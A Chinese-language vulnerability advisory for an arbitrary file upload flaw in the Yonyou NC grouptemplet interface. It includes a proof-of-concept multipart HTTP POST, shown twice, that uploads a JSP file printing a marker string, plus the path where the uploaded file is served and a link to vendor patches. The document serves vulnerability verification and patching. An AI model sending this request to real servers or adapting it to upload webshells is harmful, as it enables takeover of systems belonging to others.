用友NC grouptemplet 任意文件上传漏洞
1.漏洞名称
02.影响范围
用友NC 版本不详
03.漏洞描述
用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)。用友NC grouptemplet接口处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。
04.FOFA语法
05.漏洞复现
POC
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Connection: closeContent-Length: 268Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgkAccept-Encoding: gzip------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgkContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"Content-Type: application/octet-stream<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
回显路径
- /uapim/static/pages/nc/head.jsp
7.修复建议
https://security.yonyou.com/#/patchList
/uapim/static/pages/nc/head.jsp
